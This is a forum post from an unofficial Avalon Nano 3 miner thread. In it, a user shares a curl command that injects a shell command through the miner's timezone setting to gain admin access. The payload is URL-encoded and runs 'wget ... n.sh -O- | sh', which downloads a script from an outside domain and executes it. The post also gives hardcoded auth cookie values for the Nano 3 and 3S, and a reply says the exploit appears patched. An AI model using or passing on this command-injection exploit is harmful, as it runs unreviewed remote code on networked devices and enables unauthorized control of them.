Post
Topic
Board Hardware
Re: Avalon Nano 3 [unofficial thread]
by
PakoTor
on 06/05/2025, 02:59:30 UTC
Code:
curl 'http://<miner IP>/timezoneconf.cgi' \
  -b 'auth=ff0000ff4813494d137e1631bba301d5' \
  --data-raw 'timezone=%3Bwget%20http%3A%2F%2Fxn--i29h.ge%2Fn.sh%20-O-%7Csh%3B'

change the webpass is after auth= from
Code:
ff0000ff4813494d137e1631bba301d5

to
Code:
ff0000ffe489f84c23a6fbd9017f631a

for nano3s
use

Code:
8c6976e5b5410415bde908bd4dee15dfb167a9c873fc4bb8a81f6f2ab448a918

after that should work.

about the last part of your post:

what this code
Code:
curl 'http://<miner IP>/timezoneconf.cgi' \
  -b 'auth=ff0000ff4813494d137e1631bba301d5' \
  --data-raw 'timezone=%3Bwget%20http%3A%2F%2Fxn--i29h.ge%2Fn.sh%20-O-%7Csh%3B'

do is download a file called n.sh and execute it. here is the decoded url

Code:
wget http://xn--i29h.ge/n.sh -O- | sh


inside that n.sh file are all the commands well explained for to get the admin access. (in short, that n.sh file do all the steps you are asking more explanation.)

if you just want to review the n.sh file before just download with
Code:
wget http://xn--i29h.ge/n.sh

another alternative is create a python local server and load that file from your computer.

cheers.


Still not working.
I get a bunch of html codes which seems to be the Avalon login page.
Maybe they did patch this.
Thanks anyway